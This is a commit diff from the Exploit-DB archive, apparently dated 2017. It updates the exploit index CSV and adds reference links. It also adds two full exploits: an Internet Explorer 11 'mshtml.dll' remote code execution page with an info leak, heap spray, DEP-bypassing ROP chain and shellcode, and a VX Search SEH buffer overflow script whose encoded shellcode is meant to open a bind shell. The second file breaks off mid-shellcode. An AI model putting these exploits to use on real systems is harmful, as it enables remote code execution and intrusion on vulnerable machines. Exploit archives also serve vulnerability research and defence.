DB: 2017-11-18

3 new exploits

VX Search 10.2.14 - 'Proxy' Buffer Overflow (SEH)

Microsoft Internet Explorer 11 (Windows 7 x86) - 'mshtml.dll' Remote Code Execution (MS17-007)

Sync Breeze Enterprise 10.1.16 - 'POST' Buffer Overflow

JBS 2.0 / JBSX - Administration panel Bypass / Arbitrary File Upload
JBS 2.0 / JBSX - Administration Panel Bypass / Arbitrary File Upload
Revize CMS - Query_results.jsp SQL Injection
Revize CMS - Revize.XML Information Disclosure
Revize CMS - 'Query_results.jsp' SQL Injection
Revize CMS - 'Revize.XML' Information Disclosure

files.csv

@@ -9334,6 +9334,7 @@ id,file,description,date,author,platform,type,port
 43127,platforms/linux/local/43127.c,"Linux Kernel 4.13 (Ubuntu 17.10) - 'waitid()' SMEP/SMAP/Chrome Sandbox Privilege Escalation",2017-11-06,"Chris Salls",linux,local,0
 43134,platforms/windows/local/43134.c,"Symantec Endpoint Protection 12.1 - Tamper-Protection Bypass",2017-11-10,hyp3rlinx,windows,local,0
 43139,platforms/windows/local/43139.c,"IKARUS anti.virus 2.16.7 - 'ntguard_x64' Privilege Escalation",2017-11-13,"Parvez Anwar",windows,local,0
+43156,platforms/windows/local/43156.py,"VX Search 10.2.14 - 'Proxy' Buffer Overflow (SEH)",2017-11-16,wetw0rk,windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -15955,11 +15956,13 @@ id,file,description,date,author,platform,type,port
 43112,platforms/unix/remote/43112.rb,"tnftp - 'savefile' Arbitrary Command Execution (Metasploit)",2017-11-03,Metasploit,unix,remote,0
 43118,platforms/hardware/remote/43118.txt,"Actiontec C1000A Modem - Backdoor Account",2017-11-04,"Joseph McDonagh",hardware,remote,0
 43121,platforms/windows/remote/43121.txt,"Avaya OfficeScan (IPO) < 10.1 - 'SoftConsole' Buffer Overflow (SEH)",2017-11-05,hyp3rlinx,windows,remote,0
+43125,platforms/win_x86/remote/43125.html,"Microsoft Internet Explorer 11 (Windows 7 x86) - 'mshtml.dll' Remote Code Execution (MS17-007)",2017-10-17,mschenk,win_x86,remote,0
 43132,platforms/windows/remote/43132.rb,"Mako Server 2.5 - OS Command Injection Remote Command Execution (Metasploit)",2017-11-09,Metasploit,windows,remote,0
 43142,platforms/hardware/remote/43142.c,"Wireless IP Camera (P2P) WIFICAM - Unauthenticated Remote Code Execution",2017-03-08,PierreKimSec,hardware,remote,80
 43141,platforms/windows/remote/43141.py,"Ulterius Server < 1.9.5.0 - Directory Traversal",2017-11-13,"Rick Osgood",windows,remote,0
 43143,platforms/linux_mips/remote/43143.rb,"D-Link DIR-850L - Unauthenticated OS Command Execution (Metasploit)",2017-11-14,Metasploit,linux_mips,remote,0
 43145,platforms/windows/remote/43145.py,"Dup Scout Enterprise 10.0.18 - 'Login' Buffer Overflow",2017-11-14,sickness,windows,remote,80
+42886,platforms/windows/remote/42886.py,"Sync Breeze Enterprise 10.1.16 - 'POST' Buffer Overflow",2017-10-20,mschenk,windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -22524,7 +22527,7 @@ id,file,description,date,author,platform,type,port
 10101,platforms/php/webapps/10101.txt,"telepark wiki 2.4.23 - Multiple Vulnerabilities",2009-11-16,Abysssec,php,webapps,0
 10105,platforms/php/webapps/10105.txt,"Cifshanghai - 'chanpin_info.php' CMS SQL Injection",2009-11-16,ProF.Code,php,webapps,0
 40083,platforms/php/webapps/40083.txt,"WordPress Plugin Activity Log 2.3.1 - Persistent Cross-Site Scripting",2016-07-11,"Han Sahin",php,webapps,80
-10161,platforms/asp/webapps/10161.txt,"JBS 2.0 / JBSX - Administration panel Bypass / Arbitrary File Upload",2009-11-17,blackenedsecurity,asp,webapps,0
+10161,platforms/asp/webapps/10161.txt,"JBS 2.0 / JBSX - Administration Panel Bypass / Arbitrary File Upload",2009-11-17,blackenedsecurity,asp,webapps,0
 10165,platforms/php/webapps/10165.txt,"TelebidAuctionScript - 'aid' Blind SQL Injection",2009-11-17,"Hussin X",php,webapps,0
 10166,platforms/asp/webapps/10166.txt,"ActiveTrade 2.0 - 'default.asp' Blind SQL Injection",2009-11-17,"Hussin X",asp,webapps,0
 10167,platforms/asp/webapps/10167.txt,"ActiveBids - 'default.asp' Blind SQL Injection",2009-11-17,"Hussin X",asp,webapps,0
@@ -29133,8 +29136,8 @@ id,file,description,date,author,platform,type,port
 26527,platforms/hardware/webapps/26527.txt,"Barracuda SSL VPN 680Vx 2.3.3.193 - Multiple Script Injection Vulnerabilities",2013-07-01,LiquidWorm,hardware,webapps,0
 26528,platforms/hardware/webapps/26528.txt,"Fortigate Firewalls - Cross-Site Request Forgery",2013-07-01,"Sven Wurth",hardware,webapps,0
 26530,platforms/php/webapps/26530.txt,"GLPI 0.83.9 - 'Unserialize()' Remote Code Execution",2013-07-01,"Xavier Mehrenberger",php,webapps,0
-26532,platforms/jsp/webapps/26532.txt,"Revize CMS - Query_results.jsp SQL Injection",2005-11-17,Lostmon,jsp,webapps,0
-26533,platforms/jsp/webapps/26533.txt,"Revize CMS - Revize.XML Information Disclosure",2005-11-17,Lostmon,jsp,webapps,0
+26532,platforms/jsp/webapps/26532.txt,"Revize CMS - 'Query_results.jsp' SQL Injection",2005-11-17,Lostmon,jsp,webapps,0
+26533,platforms/jsp/webapps/26533.txt,"Revize CMS - 'Revize.XML' Information Disclosure",2005-11-17,Lostmon,jsp,webapps,0
 26534,platforms/jsp/webapps/26534.txt,"Revize CMS HTTPTranslatorServlet - Cross-Site Scripting",2005-11-17,Lostmon,jsp,webapps,0
 26535,platforms/php/webapps/26535.txt,"Litespeed 2.1.5 - 'ConfMgr.php' Cross-Site Scripting",2005-11-17,"Gama Sec",php,webapps,0
 26537,platforms/asp/webapps/26537.html,"VP-ASP Shopping Cart - 'Shopadmin.asp' HTML Injection",2005-11-17,ConcorDHacK,asp,webapps,0

platforms/php/webapps/42761.txt

@@ -14,6 +14,7 @@ through 2.9.8 allows remote attackers to inject arbitrary web script or
 HTML via the Questions field in an "Add New FAQ" action.
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14618
+https://securityprince.blogspot.fr/2017/10/cve-2017-14618-phpmyfaq-298-cross-site.html
 
 2. Proof of Concept
 

platforms/php/webapps/42978.txt

@@ -1,8 +1,7 @@
 # Exploit Title: OctoberCMS 1.0.425 (aka Build 425) Stored XSS
 # Vendor Homepage: https://octobercms.com/
 # Software Link: https://octobercms.com/download
-# Exploit Author: Ishaq Mohammed ( https://www.exploit-db.com/author/?a=9086
-)
+# Exploit Author: Ishaq Mohammed ( https://www.exploit-db.com/author/?a=9086)
 # Contact: https://twitter.com/security_prince
 # Website: https://about.me/security-prince
 # Category: webapps
@@ -31,6 +30,7 @@ Steps to Reproduce:
 
 3. Reference
 
+https://securityprince.blogspot.fr/2017/10/cve-2017-15284-octobercms-10425-build.html
 https://github.com/octobercms/library/commit/3bbbbf3da469f457881b5af902eb0b89b95189a2
 
 4. Solution

platforms/php/webapps/42987.txt

@@ -14,6 +14,7 @@ remote attackers to inject arbitrary web script or HTML via the "Title of
 your FAQ" field in the Configuration Module.
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14619
+https://securityprince.blogspot.fr/2017/10/cve-2017-14619-phpmyfaq-298-cross-site_92.html
 
 2. Proof of Concept
 

platforms/php/webapps/43140.txt

@@ -24,7 +24,8 @@ Click on Site Options.
 Click on the newly added .svg file
 
 3. Reference
-   
+
+https://securityprince.blogspot.in/2017/11/cve-2017-16807-kirby-cms-257-cross-site.html   
 https://getkirby.com/changelog/kirby-2-5-7
 
 4. Solution

platforms/win_x86/remote/43125.html

@@ -0,0 +1,149 @@
+<!DOCTYPE html>
+<html>
+<head>
+    <style>
+        .class1 { float: left; column-count: 5; }
+        .class2 { column-span: all; columns: 1px; }
+        table {border-spacing: 0px;}
+    </style>
+    <script>
+ 
+    var ntdllBase = "";
+
+     function infoleak() {
+     
+        var textarea = document.getElementById("textarea");
+        var frame = document.createElement("iframe");
+        textarea.appendChild(frame);
+        frame.contentDocument.onreadystatechange = eventhandler;
+        form.reset();  
+    }
+      
+    function eventhandler() {
+        document.getElementById("textarea").defaultValue = "foo";
+        // Object replaced here
+        // one of the side allocations of the audio element
+        var j = document.createElement("canvas");
+        ctx=j.getContext("2d");
+        ctx.beginPath();
+        ctx.moveTo(20,20);
+        ctx.lineTo(20,100);
+        ctx.lineTo(70,100);
+        ctx.strokeStyle="red";
+        ctx.stroke();              
+    }
+     
+            
+    setTimeout(function() {
+        var txt = document.getElementById("textarea");
+        var il = txt.value.substring(2,4);
+        var addr = parseInt(il.charCodeAt(1).toString(16) + il.charCodeAt(0).toString(16), 16);
+        ntdllBase = addr - 0x000d8560;
+
+        alert("NTDLL base addr is: 0x" + ntdllBase.toString(16));
+        spray();
+        boom();
+    }, 1000); 
+
+    function writeu(base, offs) {
+     
+        var res = 0;
+        if (base != 0) {  res = base + offs }
+        else {  res = offs }
+        res = res.toString(16);
+        while (res.length < 8) res = "0"+res;
+        return "%u"+res.substring(4,8)+"%u"+res.substring(0,4);
+         
+    }
+
+    function spray()
+    {
+        var hso = document.createElement("div");
+
+        var junk = unescape("%u0e0e%u0e0e");
+        while(junk.length < 0x1000) junk += junk;
+
+        //ntdll prefered base addr = 0x77ec0000
+        
+        //ROP chain built from NTDLL.DLL to disable DEP using VirtualProtect      
+        var rop = unescape(
+                writeu(ntdllBase, 0xB7786) + //0x77f77786: pop ecx ; ret 
+                writeu(0, 0x12345678) + //junk to account for retn 0x0004
+                writeu(0, 0x0e0e0e3e) + //addr of size variable placeholder
+                writeu(ntdllBase, 0x26A04) + //0x77ee6a04: xor eax, eax ; ret
+                writeu(ntdllBase, 0xC75C6) + //0x77f875c6: add eax, 0x00001000 ; pop esi ; ret
+                writeu(0, 0x12345678) + //junk into esi
+                writeu(ntdllBase, 0x1345E) + //0x77ed345e: mov dword [ecx], eax ; mov al, 0x01 ; pop ebp ; retn 0x0008
+                writeu(0, 0x12345678) + //junk into ebp
+                writeu(ntdllBase, 0xB7786) + //0x77f77786: pop ecx ; ret 
+                writeu(0, 0x12345678) + //junk to account for retn 0x0008
+                writeu(0, 0x12345678) + //junk to account for retn 0x0008
+                writeu(0, 0x0e0e0484) + //addr of protection value placeholder
+                writeu(ntdllBase, 0x26A04) + //0x77ee6a04: xor eax, eax ; ret
+                writeu(ntdllBase, 0x57C32) + //0x77f17c32: add eax, 0x20 ; ret
+                writeu(ntdllBase, 0x57C32) + //0x77f17c32: add eax, 0x20 ; ret
+                writeu(ntdllBase, 0x1345E) + //0x77ed345e: mov dword [ecx], eax ; mov al, 0x01 ; pop ebp ; retn 0x0008
+                writeu(0, 0x12345678) + //junk into ebp
+                writeu(ntdllBase, 0x13F8) + //0x77ec13f8: ret  
+                writeu(0, 0x12345678) + //junk to account for retn 0x0008
+                writeu(0, 0x12345678) + //junk to account for retn 0x0008
+                writeu(ntdllBase, 0x00045ae0) + //ntdll!ZwProtectVirtualMemory - ntdll = 0x00045ae0
+                writeu(0, 0x0e0e048c) + //return addr = shellcode addr
+                writeu(0, 0xffffffff) + //process handle (-1)
+                writeu(0, 0x0e0e0e22) + //pointer to addr of shellcode
+                writeu(0, 0x0e0e0e3e) + //pointer to size 
+                writeu(0, 0x22222222) + //placeholder for PAGE_EXECUTE_READWRITE = 0x40
+                writeu(0, 0x0e0e0e0a) //addr to write old protection value
+            );
+
+        //Shellcode
+        //root@kali:~# msfvenom  -p windows/exec cmd=calc.exe -b "\x00" -f js_le
+
+        var shellcode = unescape("%uec83%u4070" + // move stack pointer away to avoid shellcode corruption
+                "%ucadb%ub6ba%u0f7b%ud99f%u2474%u5ef4%uc929%u31b1%uee83%u31fc%u1456%u5603%u99a2%u63fa%udf22%u9c05%u80b2%u798c%u8083%u0aeb%u30b3%u5e7f%uba3f%u4b2d%uceb4%u7cf9%u647d%ub3dc%ud57e%ud51c%u24fc%u3571%ue73d%u3484%u1a7a%u6464%u50d3%u99db%u2c50%u12e0%ua02a%uc660%uc3fa%u5941%u9a71%u5b41%u9656%u43cb%u93bb%uf882%u6f0f%u2915%u905e%u14ba%u636f%u51c2%u9c57%uabb1%u21a4%u6fc2%ufdd7%u7447%u757f%u50ff%u5a7e%u1266%u178c%u7cec%ua690%uf721%u23ac%ud8c4%u7725%ufce3%u236e%ua58a%u82ca%ub6b3%u7bb5%ubc16%u6f5b%u9f2b%u6e31%ua5b9%u7077%ua5c1%u1927%u2ef0%u5ea8%ue50d%u918d%ua447%u39a7%u3c0e%u27fa%ueab1%u5e38%u1f32%ua5c0%u6a2a%ue2c5%u86ec%u7bb7%ua899%u7b64%uca88%uefeb%u2350%u978e%u3bf3" +
+        "");
+
+        //stack pivot
+        var xchg = unescape(writeu(ntdllBase, 0x2D801)); //0x77eed801: xchg eax, esp ; add al, 0x00 ; pop ebp ; retn 0x0004
+        //first stage ROP chain to do bigger stack pivot
+        var pivot = unescape(
+            writeu(ntdllBase, 0xB7786) + //0x77f77786: pop ecx ; ret 
+            writeu(0, 0x12345678) + //junk offset for retn 0x0004
+            writeu(0, 0xfffff5fa) + //offset to add to ESP to get back to the ROP chain
+            writeu(ntdllBase, 0xC4AE7) + //x77f84ae7: add esp, ecx ; pop ebp ; retn 0x0004
+            writeu(0, 0x0e0e028c) //pointer to shellcode for use with ntdll!ZwProtectVirtualMemory
+            );
+
+        var offset = 0x7c9; //magic number - offset into heap spray to reach addr 0x0e0e0e0e
+        var data = junk.substring(0, 0x200) + rop + shellcode + junk.substring(0, offset - 0xd0 - 0x200 - rop.length - shellcode.length) + pivot + junk.substring(0, 0xd0-pivot.length) + xchg;
+        
+        data += junk.substring(0, 0x800 - offset - xchg.length);
+        while(data.length < 0x80000) data += data;
+        for(var i = 0; i < 0x350; i++)
+        {
+            var obj = document.createElement("button");
+            obj.title = data.substring(0, (0x7fb00-2)/2);
+            hso.appendChild(obj);
+        }
+
+    }
+ 
+    function boom() {
+        document.styleSheets[0].media.mediaText = "aaaaaaaaaaaaaaaaaaaa";
+        th1.align = "right";
+    }
+     
+    </script>
+</head>
+ 
+<body onload=infoleak()>
+     <form id="form">
+        <textarea id="textarea" style="display:none" cols="80">aaaaaaaaaaaaa</textarea>
+    </form>
+    <table cellspacing="0">
+        <tr class="class1">
+        <th id="th1" colspan="0" width=2000000></th>
+        <th class="class2" width=0><div class="class2"></div></th>
+    </table>
+</body>
+</html>

platforms/windows/local/43156.py

@@ -0,0 +1,208 @@
+#!/usr/bin/env python
+#
+# Exploit Title     : VXSearch v10.2.14 Local SEH Overflow
+# Date              : 11/16/2017
+# Exploit Author    : wetw0rk
+# Vendor Homepage   : http://www.flexense.com/
+# Software link     : http://www.vxsearch.com/setups/vxsearchent_setup_v10.2.14.exe
+# Version           : 10.2.14
+# Tested on         : Windows 7 (x86)
+# Description       : VX Search v10.2.14 suffers from a local buffer overflow. The
+#                     following exploit will generate a bind shell on port 1337. I
+#                     was unable to get a shell working with msfvenom shellcode so
+#                     below is a custom alphanumeric bind shell. Greetz rezkon ;)
+#
+# trigger the vulnerability by :
+#   Tools -> Advanced options -> Proxy -> *Paste In Proxy Host Name
+#
+
+import struct
+
+shellcode = "w00tw00t"
+shellcode += (
+"\x25\x4a\x4d\x4e\x55"  # and eax, 0x554e4d4a
+"\x25\x35\x32\x31\x2a"  # and eax, 0x2a313235
+"\x2d\x6a\x35\x35\x35"  # sub eax, 0x3535356a
+"\x2d\x65\x6a\x6a\x65"  # sub eax, 0x656a6a65
+"\x2d\x61\x64\x4d\x65"  # sub eax, 0x654d6461
+"\x50"                  # push eax
+"\x5c"                  # pop esp
+)
+shellcode += (
+"\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x4f\x4f\x4f\x4f"
+"\x2d\x4f\x30\x4f\x68\x2d\x62\x2d\x62\x72\x50\x25\x4a\x4d\x4e"
+"\x55\x25\x35\x32\x31\x2a\x2d\x76\x57\x57\x63\x2d\x77\x36\x39"
+"\x32\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x41\x54"
+"\x54\x54\x2d\x25\x54\x7a\x2d\x2d\x25\x52\x76\x36\x50\x25\x4a"
+"\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x49\x35\x49\x49\x2d\x49"
+"\x25\x49\x69\x2d\x64\x25\x72\x6c\x50\x25\x4a\x4d\x4e\x55\x25"
+"\x35\x32\x31\x2a\x2d\x70\x33\x33\x25\x2d\x70\x25\x70\x25\x2d"
+"\x4b\x6a\x56\x39\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a"
+"\x2d\x79\x55\x75\x32\x2d\x79\x75\x75\x55\x2d\x79\x77\x77\x78"
+"\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x25\x4a\x4a"
+"\x25\x2d\x39\x5f\x4d\x34\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32"
+"\x31\x2a\x2d\x4b\x57\x4b\x57\x2d\x70\x76\x4b\x79\x2d\x70\x76"
+"\x78\x79\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x49"
+"\x49\x49\x49\x2d\x49\x4e\x64\x49\x2d\x78\x25\x78\x25\x2d\x6f"
+"\x25\x7a\x48\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d"
+"\x58\x58\x38\x58\x2d\x58\x30\x32\x58\x2d\x51\x46\x2d\x47\x50"
+"\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x5f\x52\x5f\x5f"
+"\x2d\x5f\x25\x25\x35\x2d\x62\x39\x25\x25\x50\x25\x4a\x4d\x4e"
+"\x55\x25\x35\x32\x31\x2a\x2d\x4a\x4a\x4a\x4a\x2d\x4a\x4a\x4a"
+"\x4a\x2d\x79\x39\x4a\x79\x2d\x6d\x32\x4b\x68\x50\x25\x4a\x4d"
+"\x4e\x55\x25\x35\x32\x31\x2a\x2d\x30\x30\x71\x30\x2d\x30\x25"
+"\x71\x30\x2d\x38\x31\x51\x5f\x50\x25\x4a\x4d\x4e\x55\x25\x35"
+"\x32\x31\x2a\x2d\x32\x32\x32\x32\x2d\x78\x77\x7a\x77\x50\x25"
+"\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x62\x62\x62\x62\x2d"
+"\x48\x57\x47\x4f\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a"
+"\x2d\x76\x76\x4f\x4f\x2d\x36\x39\x5a\x5a\x50\x25\x4a\x4d\x4e"
+"\x55\x25\x35\x32\x31\x2a\x2d\x61\x61\x61\x61\x2d\x4a\x61\x4a"
+"\x25\x2d\x45\x77\x53\x35\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32"
+"\x31\x2a\x2d\x63\x63\x63\x63\x2d\x39\x63\x63\x2d\x2d\x32\x63"
+"\x7a\x25\x2d\x31\x49\x7a\x25\x50\x25\x4a\x4d\x4e\x55\x25\x35"
+"\x32\x31\x2a\x2d\x72\x79\x79\x79\x2d\x25\x30\x25\x30\x2d\x25"
+"\x32\x25\x55\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d"
+"\x58\x58\x41\x58\x2d\x58\x58\x25\x77\x2d\x6e\x51\x32\x69\x50"
+"\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x48\x77\x38\x48"
+"\x2d\x4e\x76\x6e\x61\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31"
+"\x2a\x2d\x41\x41\x6e\x6e\x2d\x31\x31\x30\x6e\x2d\x37\x36\x30"
+"\x2d\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x38\x38"
+"\x38\x38\x2d\x38\x79\x38\x25\x2d\x38\x79\x38\x25\x2d\x58\x4c"
+"\x73\x25\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x61"
+"\x52\x61\x52\x2d\x37\x4a\x31\x49\x50\x25\x4a\x4d\x4e\x55\x25"
+"\x35\x32\x31\x2a\x2d\x4d\x47\x4d\x4d\x2d\x30\x25\x4d\x6b\x2d"
+"\x36\x32\x66\x71\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a"
+"\x2d\x36\x43\x43\x6c\x2d\x33\x54\x47\x25\x50\x25\x4a\x4d\x4e"
+"\x55\x25\x35\x32\x31\x2a\x2d\x4c\x4c\x4c\x4c\x2d\x6e\x4c\x6e"
+"\x36\x2d\x65\x67\x6f\x25\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32"
+"\x31\x2a\x2d\x25\x25\x4b\x4b\x2d\x25\x25\x6f\x4b\x2d\x4e\x41"
+"\x59\x2d\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x41"
+"\x41\x41\x41\x2d\x52\x52\x78\x41\x2d\x6e\x6c\x70\x25\x50\x25"
+"\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x30\x6c\x30\x30\x2d"
+"\x30\x6c\x6c\x30\x2d\x38\x70\x79\x66\x50\x25\x4a\x4d\x4e\x55"
+"\x25\x35\x32\x31\x2a\x2d\x42\x70\x70\x45\x2d\x32\x45\x70\x31"
+"\x2d\x25\x4b\x49\x31\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31"
+"\x2a\x2d\x25\x50\x50\x50\x2d\x25\x7a\x72\x25\x2d\x4e\x73\x61"
+"\x52\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x35\x77"
+"\x74\x74\x2d\x61\x78\x35\x34\x50\x25\x4a\x4d\x4e\x55\x25\x35"
+"\x32\x31\x2a\x2d\x30\x30\x30\x30\x2d\x30\x30\x59\x30\x2d\x30"
+"\x30\x74\x51\x2d\x6b\x36\x79\x67\x50\x25\x4a\x4d\x4e\x55\x25"
+"\x35\x32\x31\x2a\x2d\x75\x38\x43\x43\x2d\x7a\x31\x43\x43\x2d"
+"\x7a\x2d\x77\x79\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a"
+"\x2d\x59\x59\x59\x59\x2d\x59\x59\x59\x59\x2d\x6f\x6c\x4d\x77"
+"\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x45\x45\x45"
+"\x45\x2d\x34\x2d\x76\x45\x2d\x37\x25\x5a\x65\x50\x25\x4a\x4d"
+"\x4e\x55\x25\x35\x32\x31\x2a\x2d\x34\x34\x34\x34\x2d\x62\x34"
+"\x34\x34\x2d\x6d\x56\x47\x57\x50\x25\x4a\x4d\x4e\x55\x25\x35"
+"\x32\x31\x2a\x2d\x2d\x2d\x2d\x2d\x2d\x76\x2d\x2d\x76\x2d\x55"
+"\x4c\x55\x7a\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d"
+"\x77\x77\x77\x30\x2d\x47\x47\x79\x30\x2d\x42\x42\x39\x34\x50"
+"\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x56\x75\x36\x51"
+"\x2d\x42\x61\x49\x43\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31"
+"\x2a\x2d\x56\x56\x31\x56\x2d\x31\x79\x31\x25\x2d\x50\x6c\x48"
+"\x34\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x72\x72"
+"\x72\x72\x2d\x72\x25\x38\x38\x2d\x38\x25\x25\x25\x2d\x54\x41"
+"\x30\x30\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x47"
+"\x47\x47\x76\x2d\x47\x47\x76\x76\x2d\x6b\x72\x6c\x5a\x50\x25"
+"\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x25\x71\x25\x71\x2d"
+"\x73\x42\x63\x68\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a"
+"\x2d\x48\x55\x51\x51\x2d\x45\x78\x4f\x5a\x50\x25\x4a\x4d\x4e"
+"\x55\x25\x35\x32\x31\x2a\x2d\x45\x45\x45\x32\x2d\x45\x45\x25"
+"\x31\x2d\x76\x75\x2d\x25\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32"
+"\x31\x2a\x2d\x6e\x4f\x6d\x6e\x2d\x35\x48\x5f\x5f\x50\x25\x4a"
+"\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x2d\x2d\x2d\x2d\x2d\x71"
+"\x2d\x2d\x71\x2d\x71\x2d\x4a\x71\x2d\x66\x65\x70\x62\x50\x25"
+"\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x56\x30\x56\x30\x2d"
+"\x56\x38\x25\x30\x2d\x74\x37\x25\x45\x50\x25\x4a\x4d\x4e\x55"
+"\x25\x35\x32\x31\x2a\x2d\x32\x32\x32\x77\x2d\x32\x32\x32\x32"
+"\x2d\x43\x41\x4a\x57\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31"
+"\x2a\x2d\x63\x63\x63\x30\x2d\x79\x41\x41\x6e\x50\x25\x4a\x4d"
+"\x4e\x55\x25\x35\x32\x31\x2a\x2d\x4b\x4b\x4b\x4b\x2d\x4b\x4b"
+"\x25\x31\x2d\x4b\x71\x25\x32\x2d\x4f\x6e\x25\x2d\x50\x25\x4a"
+"\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x37\x37\x37\x37\x2d\x6d"
+"\x37\x6d\x37\x2d\x6d\x37\x6d\x37\x2d\x64\x55\x63\x58\x50\x25"
+"\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x44\x6c\x6c\x6c\x2d"
+"\x34\x44\x44\x6c\x2d\x30\x33\x4e\x54\x50\x25\x4a\x4d\x4e\x55"
+"\x25\x35\x32\x31\x2a\x2d\x2d\x7a\x43\x2d\x2d\x48\x79\x71\x47"
+"\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x41\x41\x41"
+"\x41\x2d\x41\x46\x71\x25\x2d\x5a\x77\x7a\x32\x50\x25\x4a\x4d"
+"\x4e\x55\x25\x35\x32\x31\x2a\x2d\x47\x47\x47\x47\x2d\x47\x6e"
+"\x47\x6e\x2d\x47\x78\x6e\x78\x2d\x47\x79\x77\x79\x50\x25\x4a"
+"\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x74\x38\x69\x38\x2d\x51"
+"\x4a\x72\x52\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d"
+"\x79\x79\x30\x79\x2d\x4d\x4d\x2d\x4d\x2d\x44\x35\x25\x41\x50"
+"\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x6f\x6f\x6f\x31"
+"\x2d\x74\x25\x6f\x33\x2d\x56\x32\x41\x25\x50\x25\x4a\x4d\x4e"
+"\x55\x25\x35\x32\x31\x2a\x2d\x54\x54\x54\x54\x2d\x72\x72\x54"
+"\x54\x2d\x79\x69\x49\x56\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32"
+"\x31\x2a\x2d\x70\x70\x70\x70\x2d\x70\x25\x5a\x70\x2d\x4a\x38"
+"\x36\x72\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x6d"
+"\x6d\x6d\x6d\x2d\x6d\x6d\x6d\x46\x2d\x48\x76\x74\x25\x2d\x53"
+"\x7a\x25\x25\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d"
+"\x7a\x7a\x7a\x43\x2d\x49\x43\x25\x43\x2d\x25\x5f\x25\x30\x50"
+"\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x51\x51\x51\x51"
+"\x2d\x51\x51\x51\x70\x2d\x38\x51\x61\x7a\x2d\x25\x39\x70\x7a"
+"\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x37\x44\x37"
+"\x6c\x2d\x78\x30\x6f\x73\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32"
+"\x31\x2a\x2d\x44\x25\x25\x44\x2d\x76\x25\x76\x76\x2d\x63\x6c"
+"\x63\x74\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x42"
+"\x47\x74\x4e\x2d\x33\x6c\x7a\x39\x50\x25\x4a\x4d\x4e\x55\x25"
+"\x35\x32\x31\x2a\x2d\x7a\x30\x66\x7a\x2d\x76\x44\x4f\x49\x50"
+"\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x41\x41\x41\x41"
+"\x2d\x6d\x67\x33\x6c\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31"
+"\x2a\x2d\x51\x51\x51\x51\x2d\x65\x71\x51\x51\x2d\x49\x76\x7a"
